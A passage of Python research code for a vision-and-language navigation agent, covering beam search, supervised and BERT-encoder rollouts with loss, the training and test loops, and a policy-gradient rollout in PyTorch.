mapped = [inf._replace(observation=o) for inf, o in zip(*tttt)]
acc.append(mapped)
beams = acc
update_traversed_lists(beams)
completed_list = []
for this_completed in completed:
completed_list.append(sorted(this_completed.values(), key=lambda t: t.score, reverse=True)[:completion_size])
completed_ws = [
[inf_state.world_state for inf_state in comp_l]
for comp_l in completed_list
]
completed_obs = np.array(self.env._get_obs(self.env.world_states2feature_states(completed_ws)))
accu = []
for ttttt in zip(completed_list, completed_obs):
mapped = [inf._replace(observation=o) for inf, o in zip(*ttttt)]
accu.append(mapped)
completed_list = accu
update_traversed_lists(completed_list)
trajs = []
for this_completed in completed_list:
assert this_completed
this_trajs = []
for inf_state in this_completed:
path_states, path_observations, path_actions, path_scores, path_attentions = backchain_inference_states(inf_state)
# this will have messed-up headings for (at least some) starting locations because of
# discretization, so read from the observations instead
## path = [(obs.viewpointId, state.heading, state.elevation)
## for state in path_states]
trajectory = [path_element_from_observation(ob) for ob in path_observations]
this_trajs.append({
'instr_id': path_observations[0]['instr_id'],
'instr_encoding': path_observations[0]['instr_encoding'],
'path': trajectory,
'observations': path_observations,
'actions': path_actions,
'score': inf_state.score,
'scores': path_scores,
'attentions': path_attentions
})
trajs.append(this_trajs)
return trajs, completed_list, traversed_lists
def beam_search(self, beam_size):
assert self.decoder.panoramic
# assert self.env.beam_size >= beam_size
world_states = self.env.reset(True) # [(feature, state)]
obs = np.array(self.env._get_obs(world_states))
batch_size = len(world_states)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch([o for ob in obs for o in ob])
world_states = [[world_state for f, world_state in states] for states in world_states]
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
completed = []
for _ in range(batch_size):
completed.append([])
beams = [[InferenceState(prev_inference_state=None,
world_state=ws[0],
observation=o[0],
flat_index=i,
last_action=-1,
last_action_embedding=self.decoder.u_begin,
action_count=0,
score=0.0,
h_t=None, c_t=None,
last_alpha=None)]
for i, (ws, o) in enumerate(zip(world_states, obs))]
#
# batch_size x beam_size
for t in range(self.episode_len):
flat_indices = []
beam_indices = []
u_t_list = []
for beam_index, beam in enumerate(beams):
for inf_state in beam:
beam_indices.append(beam_index)
flat_indices.append(inf_state.flat_index)
u_t_list.append(inf_state.last_action_embedding)
u_t_prev = torch.stack(u_t_list, dim=0)
flat_obs = [ob for obs_beam in obs for ob in obs_beam]
# Image features from obs
# if self.decoder.panoramic:
f_t_all, f_t = self._feature_variable(flat_obs)
# Action feature from obs
# if self.decoder.action_space == 6:
# u_t_features, is_valid = np.zeros((batch_size, 1)), None
# else:
u_t_features, is_valid, is_valid_numpy = self._action_variable(flat_obs)
h_t, c_t, alpha, logit, pred_f = self.decoder(None, u_t_prev, u_t_features,
f_t, f_t_all, h_t[flat_indices], c_t[flat_indices],
[ctx_si[beam_indices] for ctx_si in ctx] if isinstance(ctx, list) else ctx[beam_indices],
[seq_mask_si[beam_indices] for seq_mask_si in seq_mask] if isinstance(ctx, list) else seq_mask[beam_indices])
# Mask outputs where agent can't move forward
logit[is_valid == 0] = -float('inf')
masked_logit = logit # for debug
log_probs = F.log_softmax(logit, dim=1).data
_, action_indices = masked_logit.data.topk(min(beam_size, logit.size()[1]), dim=1)
action_scores = log_probs.gather(1, action_indices)
assert action_scores.size() == action_indices.size()
start_index = 0
new_beams = []
assert len(beams) == len(world_states)
all_successors = []
for beam_index, (beam, beam_world_states, beam_obs) in enumerate(zip(beams, world_states, obs)):
successors = []
end_index = start_index + len(beam)
assert len(beam_obs) == len(beam) and len(beam_world_states) == len(beam)
if beam:
for inf_index, (inf_state, world_state, ob, action_score_row, action_index_row) in \
enumerate(zip(beam, beam_world_states, beam_obs, action_scores[start_index:end_index],
action_indices[start_index:end_index])):
flat_index = start_index + inf_index
for action_score, action_index in zip(action_score_row, action_index_row):
if is_valid_numpy[flat_index, action_index] == 0:
continue
successors.append(
InferenceState(prev_inference_state=inf_state,
world_state=world_state,
# will be updated later after successors are pruned
observation=ob, # will be updated later after successors are pruned
flat_index=flat_index,
last_action=action_index,
last_action_embedding=u_t_features[flat_index, action_index].detach(),
action_count=inf_state.action_count + 1,
score=float(inf_state.score + action_score), h_t=None, c_t=None,
last_alpha=[alpha_si[flat_index].data for alpha_si in alpha] if isinstance(alpha, list) else alpha[flat_index].data)
)
start_index = end_index
successors = sorted(successors, key=lambda t: t.score, reverse=True)[:beam_size]
all_successors.append(successors)
successor_world_states = [
[inf_state.world_state for inf_state in successors]
for successors in all_successors
]
successor_env_actions = [
[inf_state.last_action for inf_state in successors]
for successors in all_successors
]
successor_last_obs = [
[inf_state.observation for inf_state in successors]
for successors in all_successors
]
successor_world_states=self.env.step(successor_env_actions, successor_last_obs, successor_world_states)
successor_obs = np.array(self.env._get_obs(successor_world_states))
successor_world_states = [[world_state for f, world_state in states] for states in successor_world_states]
acc = []
for ttt in zip(all_successors, successor_world_states, successor_obs):
mapped = [inf._replace(world_state=ws, observation=o) for inf, ws, o in zip(*ttt)]
acc.append(mapped)
all_successors=acc
for beam_index, successors in enumerate(all_successors):
new_beam = []
for successor in successors:
if successor.last_action == 0 or t == self.episode_len - 1:
completed[beam_index].append(successor)
else:
new_beam.append(successor)
if len(completed[beam_index]) >= beam_size:
new_beam = []
new_beams.append(new_beam)
beams = new_beams
world_states = [
[inf_state.world_state for inf_state in beam]
for beam in beams
]
obs = [
[inf_state.observation for inf_state in beam]
for beam in beams
]
# Early exit if all ended
if not any(beam for beam in beams):
break
trajs = []
for this_completed in completed:
assert this_completed
this_trajs = []
for inf_state in sorted(this_completed, key=lambda t: t.score, reverse=True)[:beam_size]:
path_states, path_observations, path_actions, path_scores, path_attentions = backchain_inference_states(inf_state)
# this will have messed-up headings for (at least some) starting locations because of
# discretization, so read from the observations instead
## path = [(obs.viewpointId, state.heading, state.elevation)
## for state in path_states]
trajectory = [path_element_from_observation(ob) for ob in path_observations]
this_trajs.append({
'instr_id': path_observations[0]['instr_id'],
'instr_encoding': path_observations[0]['instr_encoding'],
'path': trajectory,
'observations': path_observations,
'actions': path_actions,
'score': inf_state.score,
'scores': path_scores,
'attentions': path_attentions
})
trajs.append(this_trajs)
traversed_lists = None # todo
return trajs, completed, traversed_lists
def rollout_with_loss(self):
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
batch_size = len(obs)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
# when there are multiple sentences, perm_idx will simply be range(batch_size).
# but perm_idx for each batch of i-th(i=1 or 2 or 3) will be inside seq_length.
# this means:
# seq_lengths=[(seq_lengths,perm_idx),(seq_lengths,perm_idx),(seq_lengths,perm_idx)]
# Record starting point
traj = [{'instr_id': ob['instr_id'], 'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]} for ob in perm_obs]
# Forward through encoder, giving initial hidden state and memory cell for decoder
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
#h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
c_t = torch.zeros_like(c_t) # debug
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if self.decoder.action_space == -1:
u_t_prev = self.decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() * self.model_actions.index('<start>'), requires_grad=False).to(device)
ended = np.array([False] * batch_size) # Indices match permuation of the model, not env
# Do a sequence rollout and calculate the loss
self.loss = 0
self.loss_ctrl_f = 0
env_action = [None] * batch_size
# for plot
#all_alpha = []
action_scores = np.zeros((batch_size,))
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if self.decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if self.decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Supervised training
target = self._teacher_action(perm_obs, ended)
h_t, c_t, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, h_t, c_t, ctx, seq_mask)
# all_alpha.append(alpha)
# Mask outputs where agent can't move forward
if self.decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else:
logit[is_valid == 0] = -float('inf')
# if self.decoder.ctrl_feature:
# pred_f[is_valid == 0] = 0
if self.temp_alpha != 0: # add temperature
logit = logit/self.temp_alpha
self.loss += self.criterion(logit, target)
# Auxiliary training
if self.decoder.ctrl_feature:
target_f = self._teacher_feature(perm_obs, ended)#, is_valid.shape[-1])
self.loss_ctrl_f += self.aux_ratio * self.criterion_ctrl_f(pred_f, target_f)
# todo: add auxiliary tasks to sc-rl training?
# Determine next model inputs
# scheduled sampling
if self.schedule_ratio >= 0 and self.schedule_ratio <= 1:
sample_feedback = random.choices(['sample', 'teacher'], [self.schedule_ratio, 1 - self.schedule_ratio], k=1)[0] # schedule sampling
if self.feedback != 'argmax': # ignore test case
self.feedback = sample_feedback
a_t = self.get_next(self.feedback, target, logit)
# setting A
if self.testing_settingA:
log_probs = F.log_softmax(logit, dim=1).data
action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
# log_probs = F.log_softmax(logit, dim=1).data
# action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
a_t_prev = a_t
if self.decoder.action_space != 6: # update the previous action
u_t_prev = u_t_features[np.arange(batch_size), a_t, :].detach()
# Updated 'ended' list and make environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if action_idx == 0:
ended[i] = True
env_action[idx] = action_idx
# state transitions
new_states = self.env.step(env_action, obs)
obs = np.array(self.env._get_obs(new_states))
#obs = np.array(self.env._get_obs(self.env.step(env_action, obs))) # , sub_stages
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.testing_settingA:
if not ended[i]:
action_scores[idx] = action_scores[idx] + action_score[i]
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
else:
if action_idx == 0:
ended[i] = True
# Early exit if all ended
if ended.all(): break
# episode_len is just a constant so it doesn't matter
self.losses.append(self.loss.item()) # / self.episode_len)
if self.decoder.ctrl_feature:
self.losses_ctrl_f.append(self.loss_ctrl_f.item()) # / self.episode_len)
# with open('preprocess/alpha.pkl', 'wb') as alpha_f: # TODO: remove for release!!!!
# pickle.dump(all_alpha, alpha_f)
# chooes one from three according to prob
# for t,p in zip(traj, action_scores):
# t['prob'] = p
# chooes one from three according to prob
if self.testing_settingA:
for t, p in zip(traj, action_scores):
t['prob'] = p
return traj
def img_shrink(self, feat_all):
feat_dim = feat_all.shape[-1]
f_t, act_t = feat_all[:,:, :feat_dim-128], feat_all[:,:,-128:]
shrink = torch.cat([f_t, act_t, act_t], -1)[:,:,::3]
return shrink
def bert_rollout_with_loss(self):
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
batch_size = len(obs)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
# when there are multiple sentences, perm_idx will simply be range(batch_size).
# but perm_idx for each batch of i-th(i=1 or 2 or 3) will be inside seq_length.
# this means:
# seq_lengths=[(seq_lengths,perm_idx),(seq_lengths,perm_idx),(seq_lengths,perm_idx)]
# Record starting point
traj = [{'instr_id': ob['instr_id'], 'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]} for ob in perm_obs]
## Forward through encoder, giving initial hidden state and memory cell for decoder
#f_t = self._feature_variable(perm_obs)
#if self.decoder.panoramic: f_t_all, f_t = f_t
#else: f_t_all = np.zeros((batch_size, 1))
#ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=f_t_all)
###ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=f_t_all)
#if not self.decoder_init:
# h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
# #c_t = torch.zeros_like(c_t) # debug
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if self.decoder.action_space == -1:
u_t_prev = self.decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() * self.model_actions.index('<start>'), requires_grad=False).to(device)
ended = np.array([False] * batch_size) # Indices match permuation of the model, not env
# Do a sequence rollout and calculate the loss
self.loss = 0
self.loss_ctrl_f = 0
env_action = [None] * batch_size
# for plot
#all_alpha = []
action_scores = np.zeros((batch_size,))
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if self.decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if self.decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Supervised training
target = self._teacher_action(perm_obs, ended)
if self.encoder.__class__.__name__ in ['MultiVilAddEncoder','MultiAddLoadEncoder','MultiHugAddEncoder']:
ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, seq_lengths, f_t_all=f_t_all)
else:
ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, torch.tensor(seq_lengths), f_t_all=f_t_all)
if t == 0: # use encoder's ht and ct as init
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, en_ht, en_ct, ctx, vl_mask)
else: # otherwise unroll as lstm
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, de_ht, de_ct, ctx, vl_mask)
# all_alpha.append(alpha)
# Mask outputs where agent can't move forward
if self.decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else:
logit[is_valid == 0] = -float('inf')
# if self.decoder.ctrl_feature:
# pred_f[is_valid == 0] = 0
if self.temp_alpha != 0: # add temperature
logit = logit/self.temp_alpha
self.loss += self.criterion(logit, target)
# Auxiliary training
if self.decoder.ctrl_feature:
target_f = self._teacher_feature(perm_obs, ended)#, is_valid.shape[-1])
self.loss_ctrl_f += self.aux_ratio * self.criterion_ctrl_f(pred_f, target_f)
# todo: add auxiliary tasks to sc-rl training?
# Determine next model inputs
# scheduled sampling
if self.schedule_ratio >= 0 and self.schedule_ratio <= 1:
sample_feedback = random.choices(['sample', 'teacher'], [self.schedule_ratio, 1 - self.schedule_ratio], k=1)[0] # schedule sampling
if self.feedback != 'argmax': # ignore test case
self.feedback = sample_feedback
a_t = self.get_next(self.feedback, target, logit)
# setting A
if self.testing_settingA:
log_probs = F.log_softmax(logit, dim=1).data
action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
# log_probs = F.log_softmax(logit, dim=1).data
# action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
a_t_prev = a_t
if self.decoder.action_space != 6: # update the previous action
u_t_prev = u_t_features[np.arange(batch_size), a_t, :].detach()
# Updated 'ended' list and make environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
# # sub_stages[idx] = max(sub_stages[idx]-1, 0)
# # ended[i] = (sub_stages[idx]==0)
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if action_idx == 0:
# # sub_stages[idx] = max(sub_stages[idx] - 1, 0)
# # ended[i] = (sub_stages[idx] == 0)
ended[i] = True
env_action[idx] = action_idx
# state transitions
new_states = self.env.step(env_action, obs)
obs = np.array(self.env._get_obs(new_states))
#obs = np.array(self.env._get_obs(self.env.step(env_action, obs))) # , sub_stages
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.testing_settingA:
if not ended[i]:
action_scores[idx] = action_scores[idx] + action_score[i]
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
else:
if action_idx == 0:
ended[i] = True
# for i,idx in enumerate(perm_idx):
# action_idx = a_t[i].item()
# # if not ended[i]:
# # action_scores[idx] = action_scores[idx] + action_score[i]
# if self.decoder.action_space == 6:
# if action_idx == self.model_actions.index('<end>'):
# ended[i] = True
# else:
# if action_idx == 0:
# ended[i] = True
# Early exit if all ended
if ended.all(): break
# episode_len is just a constant so it doesn't matter
self.losses.append(self.loss.item()) # / self.episode_len)
if self.decoder.ctrl_feature:
self.losses_ctrl_f.append(self.loss_ctrl_f.item()) # / self.episode_len)
# with open('preprocess/alpha.pkl', 'wb') as alpha_f: # TODO: remove for release!!!!
# pickle.dump(all_alpha, alpha_f)
# chooes one from three according to prob
# for t,p in zip(traj, action_scores):
# t['prob'] = p
# chooes one from three according to prob
if self.testing_settingA:
for t, p in zip(traj, action_scores):
t['prob'] = p
return traj
def langbert_rollout_with_loss(self):
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
batch_size = len(obs)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
# when there are multiple sentences, perm_idx will simply be range(batch_size).
# but perm_idx for each batch of i-th(i=1 or 2 or 3) will be inside seq_length.
# this means:
# seq_lengths=[(seq_lengths,perm_idx),(seq_lengths,perm_idx),(seq_lengths,perm_idx)]
# Record starting point
traj = [{'instr_id': ob['instr_id'], 'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]} for ob in perm_obs]
## Forward through encoder, giving initial hidden state and memory cell for decoder
#f_t = self._feature_variable(perm_obs)
#if self.decoder.panoramic: f_t_all, f_t = f_t
#else: f_t_all = np.zeros((batch_size, 1))
#ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=f_t_all)
ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, seq_lengths,f_t_all=None)
#if not self.decoder_init:
# h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
# #c_t = torch.zeros_like(c_t) # debug
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if self.decoder.action_space == -1:
u_t_prev = self.decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() * self.model_actions.index('<start>'), requires_grad=False).to(device)
ended = np.array([False] * batch_size) # Indices match permuation of the model, not env
# Do a sequence rollout and calculate the loss
self.loss = 0
self.loss_ctrl_f = 0
env_action = [None] * batch_size
# for plot
#all_alpha = []
action_scores = np.zeros((batch_size,))
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if self.decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if self.decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Supervised training
target = self._teacher_action(perm_obs, ended)
#ctx, en_ht, en_ct, vl_mask = self.encoder(seq, seq_mask, torch.tensor(seq_lengths), f_t_all=f_t_all)
if t == 0: # use encoder's ht and ct as init
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, en_ht, en_ct, ctx, vl_mask)
else: # otherwise unroll as lstm
de_ht, de_ct, alpha, logit, pred_f = self.decoder(a_t_prev, u_t_prev, u_t_features, f_t, f_t_all, de_ht, de_ct, ctx, vl_mask)
# all_alpha.append(alpha)
# Mask outputs where agent can't move forward
if self.decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else:
logit[is_valid == 0] = -float('inf')
# if self.decoder.ctrl_feature:
# pred_f[is_valid == 0] = 0
if self.temp_alpha != 0: # add temperature
logit = logit/self.temp_alpha
self.loss += self.criterion(logit, target)
# Auxiliary training
if self.decoder.ctrl_feature:
target_f = self._teacher_feature(perm_obs, ended)#, is_valid.shape[-1])
self.loss_ctrl_f += self.aux_ratio * self.criterion_ctrl_f(pred_f, target_f)
# todo: add auxiliary tasks to sc-rl training?
# Determine next model inputs
# scheduled sampling
if self.schedule_ratio >= 0 and self.schedule_ratio <= 1:
sample_feedback = random.choices(['sample', 'teacher'], [self.schedule_ratio, 1 - self.schedule_ratio], k=1)[0] # schedule sampling
if self.feedback != 'argmax': # ignore test case
self.feedback = sample_feedback
a_t = self.get_next(self.feedback, target, logit)
# setting A
if self.testing_settingA:
log_probs = F.log_softmax(logit, dim=1).data
action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
# log_probs = F.log_softmax(logit, dim=1).data
# action_score = log_probs[torch.arange(batch_size), a_t].cpu().data.numpy()
a_t_prev = a_t
if self.decoder.action_space != 6: # update the previous action
u_t_prev = u_t_features[np.arange(batch_size), a_t, :].detach()
# Updated 'ended' list and make environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
# # sub_stages[idx] = max(sub_stages[idx]-1, 0)
# # ended[i] = (sub_stages[idx]==0)
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if action_idx == 0:
# # sub_stages[idx] = max(sub_stages[idx] - 1, 0)
# # ended[i] = (sub_stages[idx] == 0)
ended[i] = True
env_action[idx] = action_idx
# state transitions
new_states = self.env.step(env_action, obs)
obs = np.array(self.env._get_obs(new_states))
#obs = np.array(self.env._get_obs(self.env.step(env_action, obs))) # , sub_stages
perm_obs = obs[perm_idx]
# Save trajectory output
for i,ob in enumerate(perm_obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if self.testing_settingA:
if not ended[i]:
action_scores[idx] = action_scores[idx] + action_score[i]
if self.decoder.action_space == 6:
if action_idx == self.model_actions.index('<end>'):
ended[i] = True
else:
if action_idx == 0:
ended[i] = True
# for i,idx in enumerate(perm_idx):
# action_idx = a_t[i].item()
# # if not ended[i]:
# # action_scores[idx] = action_scores[idx] + action_score[i]
# if self.decoder.action_space == 6:
# if action_idx == self.model_actions.index('<end>'):
# ended[i] = True
# else:
# if action_idx == 0:
# ended[i] = True
# Early exit if all ended
if ended.all(): break
# episode_len is just a constant so it doesn't matter
self.losses.append(self.loss.item()) # / self.episode_len)
if self.decoder.ctrl_feature:
self.losses_ctrl_f.append(self.loss_ctrl_f.item()) # / self.episode_len)
# with open('preprocess/alpha.pkl', 'wb') as alpha_f: # TODO: remove for release!!!!
# pickle.dump(all_alpha, alpha_f)
# chooes one from three according to prob
# for t,p in zip(traj, action_scores):
# t['prob'] = p
# chooes one from three according to prob
if self.testing_settingA:
for t, p in zip(traj, action_scores):
t['prob'] = p
return traj
def test(self, use_dropout=False, feedback='argmax', allow_cheat=False, beam_size=1, successors=1, speaker=(None,None,None,None)):
''' Evaluate once on each instruction in the current environment '''
if not allow_cheat: # permitted for purpose of calculating validation loss only
assert feedback in ['argmax', 'sample'] # no cheating by using teacher at test time!
self.feedback = feedback
if use_dropout:
self.encoder.train()
self.decoder.train()
else:
self.encoder.eval()
self.decoder.eval()
super(Seq2SeqAgent, self).test(beam_size, successors, speaker)
def train(self, encoder_optimizer, decoder_optimizer, n_iters, aux_n_iter, feedback='teacher'):
''' Train for a given number of iterations '''
assert feedback in self.feedback_options
self.feedback = feedback
self.encoder.train()
self.decoder.train()
self.losses = []
self.losses_ctrl_f = []
epo_inc = 0
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
for iter in range(1, n_iters + 1):
if self.accu_n_iters == 0:
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
self.rollout()
if (not self.decoder.ctrl_feature) or (iter % aux_n_iter):
self.loss.backward()
else:
self.loss_ctrl_f.backward()
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
epo_inc += self.env.epo_inc
else:
self.rollout()
if (not self.decoder.ctrl_feature) or (iter % aux_n_iter):
self.loss /= self.accu_n_iters
self.loss.backward()
else:
self.loss_ctrl_f.backward()
if iter % self.accu_n_iters == 0:
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
epo_inc += self.env.epo_inc
return epo_inc
"""
def train(self, encoder_optimizer, decoder_optimizer, n_iters, aux_n_iter, feedback='teacher'):
''' Train for a given number of iterations '''
assert feedback in self.feedback_options
self.feedback = feedback
self.encoder.train()
self.decoder.train()
self.losses = []
self.losses_ctrl_f = []
epo_inc = 0
for iter in range(1, n_iters + 1):
encoder_optimizer.zero_grad()
decoder_optimizer.zero_grad()
self.rollout()
if (not self.decoder.ctrl_feature) or (iter % aux_n_iter):
self.loss.backward()
else:
self.loss_ctrl_f.backward()
if self.clip_gradient != 0: # clip gradient
clip_gradient(encoder_optimizer, self.clip_gradient)
clip_gradient(decoder_optimizer, self.clip_gradient)
if self.clip_gradient_norm > 0: # clip gradient norm
torch.nn.utils.clip_grad_norm_(self.encoder.parameters(), self.clip_gradient_norm)
torch.nn.utils.clip_grad_norm_(self.decoder.parameters(), self.clip_gradient_norm)
encoder_optimizer.step()
decoder_optimizer.step()
epo_inc += self.env.epo_inc
return epo_inc
"""
def rollout_notrain(self, n_iters): # jolin
epo_inc = 0
for iter in range(1, n_iters + 1):
self.env._next_minibatch(False)
epo_inc += self.env.epo_inc
return epo_inc
def rl_rollout(self, obs, perm_obs, seq, seq_mask, seq_lengths, perm_idx, feedback,
encoder, decoder):
batch_size = len(perm_obs)
# Record starting point
traj = [{'instr_id': ob['instr_id'],
'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]
} for ob in perm_obs]
# Forward through encoder, giving initial hidden state and memory cell for decoder
ctx, h_t, c_t, seq_mask = encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
# Initial action
a_t_prev, u_t_prev = None, None # different action space
if decoder.action_space==-1:
u_t_prev = decoder.u_begin.expand(batch_size, -1)
else:
a_t_prev = Variable(torch.ones(batch_size).long() *
self.model_actions.index('<start>'), requires_grad=False).to(device)
ended=np.array([False] * batch_size)
# Do a sequence rollout not don't calculate the loss for policy gradient
# self.loss = 0
env_action = [None] * batch_size
# Initialize seq log probs for policy gradient
if feedback == 'sample1':
seqLogprobs = h_t.new_zeros(batch_size, self.episode_len)
mask = np.ones((batch_size, self.episode_len))
elif feedback == 'argmax1':
seqLogprobs, mask = None, None
else:
raise NotImplementedError('other feedback not supported.')
# only for supervised auxiliary tasks
#assert (not self.decoder.ctrl_feature) # not implemented
for t in range(self.episode_len):
f_t = self._feature_variable(perm_obs)
# Image features from obs
if decoder.panoramic: f_t_all, f_t = f_t
else: f_t_all = np.zeros((batch_size, 1))
# Action feature from obs
if decoder.action_space == 6:
u_t_features, is_valid = np.zeros((batch_size, 1)), None
else:
u_t_features, is_valid, _ = self._action_variable(perm_obs)
# Decoding actions
h_t, c_t, alpha, logit, pred_f = decoder(a_t_prev, u_t_prev, u_t_features,
f_t, f_t_all, h_t, c_t, ctx, seq_mask)
# Mask outputs where agent can't move forward
if decoder.action_space == 6:
for i,ob in enumerate(perm_obs):
if len(ob['navigableLocations']) <= 1:
logit[i, self.model_actions.index('forward')] = -float('inf')
else: logit[is_valid == 0] = -float('inf')
# Supervised training
# target = self._teacher_action(perm_obs, ended)
# self.loss += self.criterion(logit, target)
# Determine next model inputs
if feedback == 'argmax1':
_, a_t = logit.max(1)
elif feedback == 'sample1':
logprobs = F.log_softmax(logit, dim=1)
probs = torch.exp(logprobs.data)
m = D.Categorical(probs)
a_t = m.sample() # sampling an action from model
sampleLogprobs = logprobs.gather(1, a_t.unsqueeze(1))
else:
sys.exit('invalid feedback method %s'%feedback)
# if self.decoder.panoramic:
# a_t_feature = all_a_t_features[np.arange(batch_size), a_t, :].detach()
# Updated 'ended' list and make environment action
for i,idx in enumerate(perm_idx):
action_idx = a_t[i].item()
if decoder.action_space == 6:
if ended[i] and mask is not None:
mask[i, t] = 0
elif action_idx == self.model_actions.index('<end>'):
ended[i] = True
env_action[idx] = self.env_actions[action_idx]
else:
if ended[i] and mask is not None:
mask[i, t] = 0
elif action_idx == 0: ended[i] = True
env_action[idx] = action_idx
obs = np.array(self.env._get_obs(self.env.step(env_action, obs)))
perm_obs = obs[perm_idx]
